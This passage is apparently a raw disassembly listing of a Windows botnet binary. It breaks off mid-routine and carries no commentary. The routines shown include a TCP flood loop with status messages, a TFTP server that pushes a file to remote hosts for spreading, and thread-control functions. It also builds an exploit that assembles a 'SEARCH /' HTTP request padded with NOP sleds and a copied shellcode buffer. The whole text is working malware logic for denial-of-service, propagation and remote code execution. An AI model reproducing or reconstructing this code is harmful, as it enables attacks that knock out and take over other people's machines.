pop ecx
push 5
lea esi, [ebp+var_64]
lea edi, [ebp+var_BD8]
rep movsd
pop ecx
lea esi, [ebp+var_18]
lea edi, [ebp+var_BB8]
rep movsd
mov ecx, ebx
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_13A8]
lea edi, [ebp+var_BA4]
rep movsd
mov ecx, eax
lea eax, [ebx+34h]
push eax
lea eax, [ebp+var_BD8]
and ecx, 3
push eax
rep movsb
call sub_407DA7
push 5
pop ecx
push 5
mov [ebp+var_8], ax
lea esi, [ebp+var_30]
lea edi, [ebp+var_BD8]
rep movsd
pop ecx
lea esi, [ebp+var_18]
lea edi, [ebp+var_BC4]
rep movsd
mov ecx, ebx
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_13A8]
lea edi, [ebp+var_BB0]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
lea edi, [ebp+ebx+var_BB0]
stosd
add ebx, 28h
lea eax, [ebp+var_BD8]
push ebx
push eax
call sub_407DA7
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+var_26], ax
lea esi, [ebp+var_30]
lea edi, [ebp+var_BD8]
lea eax, [ebp+var_44]
push eax
rep movsd
xor esi, esi
push esi
push ebx
lea eax, [ebp+var_BD8]
push eax
push [ebp+var_4]
call dword_4357B8 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_411F68
inc [ebp+arg_0]
call ds:dword_420004 ; GetTickCount
sub eax, [ebp+var_1C]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edi, edi
cmp eax, [ebp+var_78]
jbe loc_411C13
loc_411EDD: ; CODE XREF: sub_411A79+178�j
push [ebp+var_4]
call dword_4358F4 ; closesocket
mov eax, [ebp+arg_0]
imul eax, 7D0h
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+var_78]
shr ecx, 14h
push ecx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_408]
push offset aTcpDoneWithSFl ; "[TCP]: Done with %s flood to IP: %s. Se"...
push eax
call sub_4145E5
add esp, 1Ch
cmp [ebp+var_6C], edi
jnz short loc_411F48
loc_411F28: ; CODE XREF: sub_411A79+107�j
push edi
push [ebp+var_70]
lea eax, [ebp+var_408]
push eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_208]
call sub_4056FB
add esp, 14h
loc_411F48: ; CODE XREF: sub_411A79+101�j
; sub_411A79+4AD�j
lea eax, [ebp+var_408]
push eax
call sub_401EFF
push [ebp+var_84]
call sub_412735
pop ecx
pop ecx
push edi
loc_411F62: ; CODE XREF: sub_411A79+C4�j
call ds:dword_420014 ; ExitThread
loc_411F68: ; CODE XREF: sub_411A79+43E�j
push [ebp+var_4]
call dword_4358F4 ; closesocket
call dword_4358A0 ; WSAGetLastError
push eax
push [ebp+arg_0]
lea eax, [ebp+var_204]
push eax
push offset aTcpErrorSendin ; "[TCP]: Error sending packets to IP: %s."...
lea eax, [ebp+var_408]
push 200h
push eax
call sub_41483D
add esp, 18h
cmp [ebp+var_6C], esi
jnz loc_411B23
jmp loc_411B03
sub_411A79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411FA9 proc near ; CODE XREF: sub_411FA9:loc_412462�p
; DATA XREF: sub_401141+107�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 884h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, offset aOctet ; "octet"
lea edi, [ebp+74h+var_1C]
movsd
movsw
xor ebx, ebx
push ebx
xor eax, eax
inc eax
mov esi, edx
push 2
mov ecx, 0A9h
lea edi, [ebp+74h+var_37C]
rep movsd
inc [ebp+74h+var_16C]
push 2
mov [ebp+74h+var_10], eax
mov [edx+2A0h], eax
call dword_4357E8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+74h+var_4], esi
jnz short loc_412065
push 190h
call ds:dword_420000 ; Sleep
call dword_4358A0 ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpErrorSocke ; "[TFTP]: Error: socket() failed, returne"...
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+74h+var_E0], ebx
jnz short loc_412048
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4056FB
add esp, 14h
loc_412048: ; CODE XREF: sub_411FA9+7D�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401EFF
push [ebp+74h+var_170]
call sub_412735
pop ecx
jmp loc_41244E
; ---------------------------------------------------------------------------
loc_412065: ; CODE XREF: sub_411FA9+52�j
mov eax, [ebp+74h+var_170]
push [ebp+74h+var_168]
imul eax, 234h
mov dword_43668C[eax], esi
xor eax, eax
lea edi, [ebp+74h+var_44]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_44], 2
call dword_435934 ; ntohs
mov [ebp+74h+var_42], ax
push 10h
lea eax, [ebp+74h+var_44]
push eax
push esi
mov [ebp+74h+var_40], ebx
call dword_4358C0 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4120C4
push 1388h
call ds:dword_420000 ; Sleep
dec [ebp+74h+var_16C]
push [ebp+74h+arg_0]
jmp loc_412462
; ---------------------------------------------------------------------------
loc_4120C4: ; CODE XREF: sub_411FA9+100�j
lea eax, [ebp+74h+var_378]
push offset dword_420978
push eax
call sub_414DC3
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+74h+var_8], eax
jnz short loc_41213D
push 190h
call ds:dword_420000 ; Sleep
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpFailedToOp ; "[TFTP]: Failed to open file: %s."
push eax
call sub_4145E5
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4056FB
lea eax, [ebp+74h+var_780]
push eax
call sub_401EFF
push [ebp+74h+var_170]
call sub_412735
add esp, 28h
jmp loc_41244F
; ---------------------------------------------------------------------------
loc_41213D: ; CODE XREF: sub_411FA9+133�j
mov esi, 200h
loc_412142: ; CODE XREF: sub_411FA9+471�j
mov edi, [ebp+74h+arg_0]
cmp [edi+2A0h], ebx
jz loc_412423
mov eax, [ebp+74h+var_4]
push 20h
pop ecx
mov [ebp+74h+var_880], eax
xor eax, eax
lea edi, [ebp+74h+var_D8]
rep stosd
lea eax, [ebp+74h+var_34]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_884]
push eax
push ebx
mov [ebp+74h+var_34], 5
mov [ebp+74h+var_30], 1388h
mov [ebp+74h+var_884], 1
call dword_43588C ; select
test eax, eax
jle loc_412417
xor eax, eax
mov edx, 80h
mov [ebp+74h+var_580], bl
mov ecx, edx
lea edi, [ebp+74h+var_57F]
rep stosd
stosw
stosb
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push edx
lea eax, [ebp+74h+var_D8]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_C], 10h
call dword_435780 ; recvfrom
push [ebp+74h+var_28]
mov [ebp+74h+var_10], eax
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_58]
push eax
call sub_4145E5
cmp [ebp+74h+var_D8], bl
pop ecx
pop ecx
jnz loc_4123FF
cmp [ebp+74h+var_D7], 1
jnz loc_41235A
lea eax, [ebp+74h+var_274]
lea edx, [eax+1]
loc_412204: ; CODE XREF: sub_411FA9+260�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_412204
sub eax, edx
mov [ebp+74h+var_14], eax
lea eax, [ebp+74h+var_274]
lea edi, [eax+1]
loc_412219: ; CODE XREF: sub_411FA9+275�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_412219
sub eax, edi
push eax
lea eax, [ebp+74h+var_D6]
push eax
lea eax, [ebp+74h+var_274]
push eax
call sub_415EE0
add esp, 0Ch
test eax, eax
jnz loc_412318
lea eax, [ebp+74h+var_1C]
lea edx, [eax+1]
loc_412244: ; CODE XREF: sub_411FA9+2A0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_412244
sub eax, edx
push eax
mov eax, [ebp+74h+var_14]
lea eax, [ebp+eax+74h+var_D5]
push eax
lea eax, [ebp+74h+var_1C]
push eax
call sub_415EE0
add esp, 0Ch
test eax, eax
jnz loc_412318
push ebx
push ebx
push [ebp+74h+var_8]
call sub_416257
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
mov [ebp+74h+var_57E], bl
mov [ebp+74h+var_57D], 1
call sub_414B6E
add esp, 1Ch
push [ebp+74h+var_C]
lea ecx, [ebp+74h+var_2C]
push ecx
mov [ebp+74h+var_10], eax
push ebx
add eax, 4
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
call dword_4357B8 ; sendto
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTransf ; "[TFTP]: File transfer started to IP: %s"...
loc_4122D2: ; CODE XREF: sub_411FA9+451�j
lea eax, [ebp+74h+var_780]
push eax
call sub_4145E5
add esp, 10h
cmp [ebp+74h+var_E0], ebx
jnz short loc_412306
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4056FB
add esp, 14h
loc_412306: ; CODE XREF: sub_411FA9+33B�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401EFF
pop ecx
jmp loc_412417
; ---------------------------------------------------------------------------
loc_412318: ; CODE XREF: sub_411FA9+28F�j
; sub_411FA9+2BB�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 13h
push offset dword_4288FC
push [ebp+74h+var_4]
call dword_4357B8 ; sendto
lea eax, [ebp+74h+var_274]
push eax
lea eax, [ebp+74h+var_58]
push eax
lea eax, [ebp+74h+var_D8]
push offset aTftpFileNotFou ; "[TFTP]: File not found: %s (%s)."
push eax
call sub_4145E5
lea eax, [ebp+74h+var_D8]
push eax
call sub_401EFF
add esp, 14h
jmp loc_412417
; ---------------------------------------------------------------------------
loc_41235A: ; CODE XREF: sub_411FA9+24C�j
cmp [ebp+74h+var_D7], 4
jnz loc_4123FF
mov cl, [ebp+74h+var_D5]
cmp cl, 0FFh
mov al, [ebp+74h+var_D6]
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
jnz short loc_412388
inc al
xor cl, cl
mov [ebp+74h+var_57D], bl
jmp short loc_412390
; ---------------------------------------------------------------------------
loc_412388: ; CODE XREF: sub_411FA9+3D1�j
inc cl
mov [ebp+74h+var_57D], cl
loc_412390: ; CODE XREF: sub_411FA9+3DD�j
mov [ebp+74h+var_57E], al
movzx eax, al
shl eax, 8
movzx ecx, cl
add eax, ecx
shl eax, 9
push ebx
sub eax, esi
push eax
push [ebp+74h+var_8]
call sub_416257
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
call sub_414B6E
add esp, 1Ch
push [ebp+74h+var_C]
mov edi, eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
lea eax, [edi+4]
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_10], edi
call dword_4357B8 ; sendto
cmp edi, ebx
jnz short loc_412417
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTran_0 ; "[TFTP]: File transfer complete to IP: %"...
jmp loc_4122D2
; ---------------------------------------------------------------------------
loc_4123FF: ; CODE XREF: sub_411FA9+242�j
; sub_411FA9+3B5�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 9
push offset dword_42889C
push [ebp+74h+var_4]
call dword_4357B8 ; sendto
loc_412417: ; CODE XREF: sub_411FA9+1E9�j
; sub_411FA9+36A�j ...
cmp [ebp+74h+var_10], ebx
jg loc_412142
mov edi, [ebp+74h+arg_0]
loc_412423: ; CODE XREF: sub_411FA9+1A2�j
push [ebp+74h+var_4]
call dword_4358F4 ; closesocket
push [ebp+74h+var_8]
call sub_4149C3
dec [ebp+74h+var_16C]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_412456
push [ebp+74h+var_170]
call sub_412735
loc_41244E: ; CODE XREF: sub_411FA9+B7�j
pop ecx
loc_41244F: ; CODE XREF: sub_411FA9+18F�j
push ebx
call ds:dword_420014 ; ExitThread
loc_412456: ; CODE XREF: sub_411FA9+498�j
push 3E8h
call ds:dword_420000 ; Sleep
push edi
loc_412462: ; CODE XREF: sub_411FA9+116�j
call sub_411FA9
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn 4
sub_411FA9 endp
; =============== S U B R O U T I N E =======================================
sub_412471 proc near ; CODE XREF: sub_401141+F0�p
; sub_401141+23D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_436480
loc_412479: ; CODE XREF: sub_412471+18�j
cmp byte ptr [eax], 0
jz short loc_41248D
add eax, 234h
inc edi
cmp eax, offset dword_47B210
jl short loc_412479
jmp short loc_4124D8
; ---------------------------------------------------------------------------
loc_41248D: ; CODE XREF: sub_412471+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_436480[esi]
push eax
call sub_414670
mov eax, [esp+14h+arg_4]
and dword_436684[esi], 0
and dword_436688[esi], 0
mov dword_436680[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and byte_436698[esi], 0
mov dword_43668C[esi], eax
pop esi
loc_4124D8: ; CODE XREF: sub_412471+1A�j
mov eax, edi
pop edi
retn
sub_412471 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124DC proc near ; CODE XREF: sub_412772+31�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
xor edi, edi
mov esi, offset dword_436480
loc_412506: ; CODE XREF: sub_4124DC+78�j
cmp byte ptr [esi], 0
jz short loc_412547
cmp [ebp+arg_C], 0
jnz short loc_41251A
cmp dword ptr [esi+204h], 0
jnz short loc_412547
loc_41251A: ; CODE XREF: sub_4124DC+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_4145E5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 24h
loc_412547: ; CODE XREF: sub_4124DC+2D�j
; sub_4124DC+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_47B210
jl short loc_412506
pop edi
pop esi
leave
retn
sub_4124DC endp
; =============== S U B R O U T I N E =======================================
sub_41255A proc near ; CODE XREF: sub_408A18+3CA6�p
; sub_4125E2+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_4125DC
cmp esi, 1F4h
jge short loc_4125DC
imul esi, 234h
push edi
push ebx
lea edi, dword_436694[esi]
push dword ptr [edi]
call ds:dword_4200F0 ; TerminateThread
cmp [edi], ebx
jz short loc_41258C
inc ebp
loc_41258C: ; CODE XREF: sub_41255A+2F�j
mov [edi], ebx
lea edi, dword_436688[esi]
mov eax, [edi]
cmp eax, ebx
mov dword_436680[esi], ebx
mov dword_436684[esi], ebx
jbe short loc_4125AD
push eax
call sub_4085E4
pop ecx
loc_4125AD: ; CODE XREF: sub_41255A+4A�j
mov [edi], ebx
lea edi, dword_43668C[esi]
push dword ptr [edi]
mov byte ptr dword_436480[esi], bl
mov byte_436698[esi], bl
call dword_4358F4 ; closesocket
lea esi, dword_436690[esi]
push dword ptr [esi]
mov [edi], ebx
call dword_4358F4 ; closesocket
mov [esi], ebx
pop edi
loc_4125DC: ; CODE XREF: sub_41255A+D�j
; sub_41255A+15�j
pop esi
mov eax, ebp
pop ebp
pop ebx
retn
sub_41255A endp
; =============== S U B R O U T I N E =======================================
sub_4125E2 proc near ; CODE XREF: sub_402E99+18�p
; sub_408A18+3C5F�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_436480
loc_4125EE: ; CODE XREF: sub_4125E2+2A�j
cmp byte ptr [esi], 0
jz short loc_4125FF
push edi
call sub_41255A
test eax, eax
pop ecx
jz short loc_4125FF
inc ebx
loc_4125FF: ; CODE XREF: sub_4125E2+F�j
; sub_4125E2+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_47B210
jl short loc_4125EE
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_4125E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412614 proc near ; CODE XREF: sub_4126A7+1D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_436684
loc_412628: ; CODE XREF: sub_412614+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_41264A
test edi, edi
jle short loc_41263C
cmp [esi], edi
jz short loc_41263C
cmp ebx, edi
jnz short loc_41264A
loc_41263C: ; CODE XREF: sub_412614+1E�j
; sub_412614+22�j
push ebx
call sub_41255A
test eax, eax
pop ecx
jz short loc_41264A
inc [ebp+var_4]
loc_41264A: ; CODE XREF: sub_412614+1A�j
; sub_412614+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_47B414
jl short loc_412628
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_412614 endp
; =============== S U B R O U T I N E =======================================
sub_412661 proc near ; CODE XREF: sub_4010CA+B�p
; sub_401141+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_436680
loc_412668: ; CODE XREF: sub_412661+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_412671
inc eax
loc_412671: ; CODE XREF: sub_412661+D�j
add ecx, 234h
cmp ecx, offset dword_47B410
jl short loc_412668
retn
sub_412661 endp
; =============== S U B R O U T I N E =======================================
sub_412680 proc near ; CODE XREF: sub_408A18+45A5�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_436680
push esi
loc_41268A: ; CODE XREF: sub_412680+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_4126A3
add ecx, 234h
inc edx
cmp ecx, offset dword_47B410
jl short loc_41268A
pop esi
retn
; ---------------------------------------------------------------------------
loc_4126A3: ; CODE XREF: sub_412680+10�j
mov eax, edx
pop esi
retn
sub_412680 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4126A7 proc near ; CODE XREF: sub_408A18+1EDD�p
; sub_408A18+4CE4�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_4126C0
push [ebp+arg_1C]
call sub_414972
pop ecx
loc_4126C0: ; CODE XREF: sub_4126A7+E�j
push eax
push [ebp+arg_18]
call sub_412614
test eax, eax
pop ecx
pop ecx
jle short loc_4126EC
push eax
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_4145E5
add esp, 14h
jmp short loc_412706
; ---------------------------------------------------------------------------
loc_4126EC: ; CODE XREF: sub_4126A7+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_4145E5
add esp, 10h
loc_412706: ; CODE XREF: sub_4126A7+43�j
cmp [ebp+arg_C], 0
jnz short loc_412726
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_412726: ; CODE XREF: sub_4126A7+63�j
lea eax, [ebp+var_200]
push eax
call sub_401EFF
pop ecx
leave
retn
sub_4126A7 endp
; =============== S U B R O U T I N E =======================================
sub_412735 proc near ; CODE XREF: sub_401967+227�p
; sub_401B9D+244�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
imul eax, 234h
xor ecx, ecx
mov dword_436694[eax], ecx
mov dword_436680[eax], ecx
mov dword_436684[eax], ecx
mov dword_436688[eax], ecx
mov dword_43668C[eax], ecx
mov dword_436690[eax], ecx
mov byte ptr dword_436480[eax], cl
mov byte_436698[eax], cl
retn
sub_412735 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_412772 proc near ; DATA XREF: sub_408A18+4B38�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
push [ebp+74h+var_10]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4124DC
push [ebp+74h+var_14]
call sub_412735
add esp, 14h
push 0
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_412772 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127BC proc near ; CODE XREF: sub_401967+1F8�p
; DATA XREF: .data:off_42B06C�o
var_1210 = byte ptr -1210h
var_11AC = byte ptr -11ACh
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_98 = byte ptr 0A0h
arg_124 = dword ptr 12Ch
arg_12C = dword ptr 134h
arg_134 = dword ptr 13Ch
arg_138 = dword ptr 140h
push ebp
mov ebp, esp
mov eax, 1210h
call sub_414800
push 6
push 1
push 2
call dword_4357E8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_4127E1
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4127E1: ; CODE XREF: sub_4127BC+1F�j
push ebx
push esi
push edi
push [ebp+arg_124]
call dword_435934 ; ntohs
lea eax, [ebp+arg_4]
push eax
call dword_43585C ; inet_addr
push 186A0h
call sub_414E7D
mov edi, 1000h
push edi
mov ebx, eax
call sub_414E7D
pop ecx
pop ecx
push offset byte_42BF44
push [ebp+arg_0]
mov esi, eax
mov [ebp+var_C], esi
call sub_407D51
pop ecx
push eax
push edi
push esi
call sub_410CE6
add esp, 10h
test eax, eax
mov [ebp+var_8], eax
jnz short loc_412856
push ebx
call sub_414A14
push esi
call sub_414A14
pop ecx
pop ecx
push [ebp+var_10]
loc_412849: ; CODE XREF: sub_4127BC+27B�j
call dword_4358F4 ; closesocket
xor eax, eax
jmp loc_412AD6
; ---------------------------------------------------------------------------
loc_412856: ; CODE XREF: sub_4127BC+7A�j
push 19h
mov eax, 90909090h
pop ecx
lea edi, [ebp+var_1210]
rep stosd
mov ecx, [ebp+var_8]
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_11AC]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov ecx, 61A8h
mov edi, ebx
rep stosd
mov esi, offset aSearch ; "SEARCH /"
mov edi, ebx
movsd
movsd
mov eax, ebx
movsb
lea esi, [eax+1]
loc_412897: ; CODE XREF: sub_4127BC+E0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412897
sub eax, esi
mov esi, eax
lea edx, [esi+1]
lea eax, [esi+866h]
cmp edx, eax
mov byte ptr [esi+ebx], 90h
jnb short loc_4128D5
sub eax, edx
dec eax
shr eax, 1
inc eax
mov ecx, eax
mov [ebp+var_4], ecx
shr ecx, 1
lea edi, [edx+ebx]
mov eax, 0B102B102h
rep stosd
adc ecx, ecx
rep stosw
mov eax, [ebp+var_4]
lea edx, [edx+eax*2]
loc_4128D5: ; CODE XREF: sub_4127BC+F5�j
mov eax, offset loc_42C480
mov edi, eax
lea ecx, [edi+1]
mov [ebp+var_4], ecx
loc_4128E2: ; CODE XREF: sub_4127BC+12B�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_4128E2
sub edi, [ebp+var_4]
jmp short loc_412903
; ---------------------------------------------------------------------------
loc_4128EE: ; CODE XREF: sub_4127BC+155�j
lea ecx, [edi+1]
mov byte ptr [edx+ebx], 90h
inc edx
mov [ebp+var_4], ecx
loc_4128F9: ; CODE XREF: sub_4127BC+142�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_4128F9
sub edi, [ebp+var_4]
loc_412903: ; CODE XREF: sub_4127BC+130�j
mov ecx, esi
sub ecx, edi
add ecx, 0FFFFh
cmp edx, ecx
mov edi, eax
jb short loc_4128EE
lea esi, [edi+1]
loc_412916: ; CODE XREF: sub_4127BC+15F�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_412916
sub edi, esi
mov ecx, edi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [edx+ebx]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebx
dec edi
loc_412937: ; CODE XREF: sub_4127BC+181�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_412937
mov esi, offset aHttp1_1 ; " HTTP/1.1\r\n"
movsd
movsd
movsd
mov esi, offset a?xmlVersion1_0 ; "<?xml version=\"1.0\"?>\r\n<g:searchrequest"...
mov eax, esi
lea edi, [eax+1]
loc_412951: ; CODE XREF: sub_4127BC+19A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412951
sub eax, edi
mov edi, eax
mov eax, ebx
lea ecx, [eax+1]
loc_412961: ; CODE XREF: sub_4127BC+1AA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_412961
sub eax, ecx
mov ecx, [ebp+var_8]
add edi, ecx
push edi
lea ecx, [ebp+arg_4]
push ecx
add eax, ebx
push offset aHostSContentTy ; "Host: %s\r\nContent-Type: text/xml\r\nConte"...
push eax
call sub_4145E5
add esp, 10h
mov eax, esi
loc_412986: ; CODE XREF: sub_4127BC+1CF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412986
mov edi, ebx
sub eax, esi
dec edi
loc_412992: ; CODE XREF: sub_4127BC+1DC�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_412992
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_4129AD: ; CODE XREF: sub_4127BC+1F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4129AD
sub eax, esi
mov ecx, eax
mov eax, 1010101h
lea edi, [ecx+ebx]
stosb
mov eax, ebx
lea esi, [eax+1]
loc_4129C6: ; CODE XREF: sub_4127BC+20F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4129C6
sub eax, esi
mov ecx, eax
mov eax, 90909090h
lea edi, [ecx+ebx]
stosw
stosb
mov eax, ebx
lea esi, [eax+1]
loc_4129E1: ; CODE XREF: sub_4127BC+22A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4129E1
mov ecx, [ebp+var_8]
sub eax, esi
lea edi, [eax+ebx]
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_1210]
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_412A09: ; CODE XREF: sub_4127BC+252�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412A09
sub eax, esi
mov esi, [ebp+var_10]
xor edi, edi
push edi
push eax
push ebx
push esi
